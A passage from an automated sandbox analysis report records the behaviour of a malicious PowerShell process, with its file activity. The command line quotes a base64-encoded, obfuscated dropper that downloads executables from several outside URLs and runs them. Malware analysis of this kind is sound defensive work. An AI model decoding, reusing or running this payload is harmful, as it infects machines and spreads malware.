YgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBM AE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgACQA TABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAcwAn ACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuACgAJ wBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeABwA GgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1ADcAO AA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0A GUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6ADEAe QA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOwBiA HIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlACcAK wAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEA DUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkACcAK QArACcAZwBuACcAKQA='
Imagebase: 0x1320000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Analysis Process: conhost.exe PID: 6912 Parent PID: 6904

General

Start time: 15:00:47
Start date: 02/09/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66fd50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 6956 Parent PID: 6904

General

Start time: 15:00:48
Start date: 02/09/2020
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true

Commandline: powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArA CcAaAAnACkAKwAoACcAcgAzACcAKwAnAGwAJwApACkAOwAuACgAJwBuAGUAd wAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSA G8AZgBpAGwARQBcAFAAUwAyADkAQgA2AEMAXABMAFMAcQAzAEIAXwBMAFwAI AAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOA GUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAX QA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvA EwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAJ wArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArA CgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgAagB0ADUAYwAgAD0AI AAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApA CsAJwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0AKAAoACcAQgBjACcAK wAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoA DkAbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJ wA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApA CsAJwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkAKwAoACcAcQAzACcAK wAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBA EMAZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAK wAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlA CcAKQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcAVgAzACcAKwAnAHEAN AAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0A G0APQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAK QAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvA GIAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8AJwArACgAJ wAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnA HQALQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJwArACcAL gBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArA CgAJwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgAN wBuAHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnA HQAdAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAK wAoACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrA GUAbABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAK 
QArACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnA GwAVQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAK AAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnA CkAKwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQAL gBkACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpA CcAKwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAY QAnACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhA GsAJwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoAL wAvACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnA GgAJwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJ wBvAG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArA CcAdABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAK gBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnA CsAKAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAK wAnAGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoA CcAaQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAK AAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnA C8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJ wAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnA G4AJwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJ wBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnA CsAJwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAK AAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArA CgAJwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJ wArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuA CcAKwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAK wAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApA CsAJwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAa ABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnA CsAJwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZ QBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnA G8AYgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAAT 
gBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgA CQATABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAc wAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuAC gAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeA BwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1AD cAOAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJw B0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6AD EAeQA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOw BiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlAC cAKwAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJA BEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkAC cAKQArACcAZwBuACcAKQA=
Imagebase: 0x1260000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol

File Path: C:\Users\user; Access: read data or list directory | synchronize; Attributes: device; Options: directory file | synchronous io non alert | open for backup ident | open reparse point; Completion: object name collision; Count: 1; Address: 6DE0CF06; Symbol: unknown
File Path: C:\Users\user\AppData\Roaming; Access: read data or list directory | synchronize; Attributes: device; Options: directory file | synchronous io non alert | open for backup ident | open reparse point; Completion: object name collision; Count: 1; Address: 6DE0CF06; Symbol: unknown
File Path: C:\Windows\system32\catroot; Access: read data or list directory | synchronize; Attributes: device; Options: directory file | synchronous io non alert | open for backup ident | open reparse point; Completion: object name collision; Count: 1; Address: 6C8E5B28; Symbol: unknown
File Path: C:\Windows\system32\catroot2; Access: read data or list directory | synchronize; Attributes: device; Options: directory file | synchronous io non alert | open for backup ident | open reparse point; Completion: object name collision; Count: 1; Address: 6C8E5B28; Symbol: unknown
File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Access: read attributes | synchronize | generic write; Attributes: device; Options: synchronous io non alert | non directory file; Completion: success or wait; Count: 1; Address: 6DFD1926; Symbol: CreateFileW

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol

File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Offset: unknown; Length: 64; Value: 40 00 00 01 65 00 00 00 00 00 00 00 0a 00 00 00 05 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00; Ascii: @...e......; Completion: success or wait; Count: 1; Address: 6E0D76FC; Symbol: WriteFile
File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Offset: unknown; Length: 40; Value: 48 00 00 02 03 00 00 00 00 00 00 00 01 00 00 00 3c 40 b0 5e e7 8d bf 4c b2 22 4d 79 98 9c a7 3a 03 00 00 00 0e 00 20 00; Ascii: H...... <@.^...L."My...:......; Completion: success or wait; Count: 10; Address: 6E0D76FC; Symbol: WriteFile
File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Offset: unknown; Length: 32; Value: 4d 69 63 72 6f 73 6f 66 74 2e 50 6f 77 65 72 53 68 65 6c 6c 2e 43 6f 6e 73 6f 6c 65 48 6f 73 74; Ascii: Microsoft.PowerShell.ConsoleHost; Completion: success or wait; Count: 10; Address: 6E0D76FC; Symbol: WriteFile
File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Offset: unknown; Length: 1; Value: 00; Ascii: .; Completion: success or wait; Count: 7; Address: 6E0D76FC; Symbol: WriteFile
File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Offset: unknown; Length: 4; Value: 40 00 00 03; Ascii: @...; Completion: success or wait; Count: 1; Address: 6E0D76FC; Symbol: WriteFile
File Path: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive; Offset: unknown; Length: 60; Value: 00 0e 80 00 01 0e 80 00 02 0e 80 00 03 0e 80 00 04 0e 80 00 05 0e 80 00 06 0e 80 00 07 0e 80 00 08 0e 80 00 09 0c 80 00 54 01 40 00 f9 3e 40 01 47 01 40 00 da 00 40 00 0e 40 40 01; Ascii: ...... ...... T.@..>@.G.@...@.. @@.; Completion: success or wait; Count: 1; Address: 6E0D76FC; Symbol: WriteFile

File Read

Source File Path | Offset | Length | Completion | Count | Address | Symbol

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll.aux | unknown | 176 | success or wait | 1 | 6DD403DE | ReadFile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDECA54 | ReadFile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDECA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6DDECA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6DDECA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6DDECA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 1 | 6DDECA54 | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6DDECA54 | ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll.aux | unknown | 900 | success or wait | 1 | 6DD403DE | ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll.aux | unknown | 620 | success or wait | 1 | 6DD403DE | ReadFile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDE5705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | unknown | 8173 | end of file | 1 | 6DDE5705 | unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll.aux | unknown | 748 | success or wait | 1 | 6DD403DE | ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\ccc7c82770f93d1392abde4be3a80378\Microsoft.Management.Infrastructure.ni.dll.aux | unknown | 748 | success or wait | 1 | 6DD403DE | ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4095 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 6135 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4097 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4098 | success or wait | 2 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 7976 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4121 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 4253 | success or wait | 1 | 6DDE5705 | unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | unknown | 8171 | end of file | 1 | 6DDE5705 | unknown

Disassembly
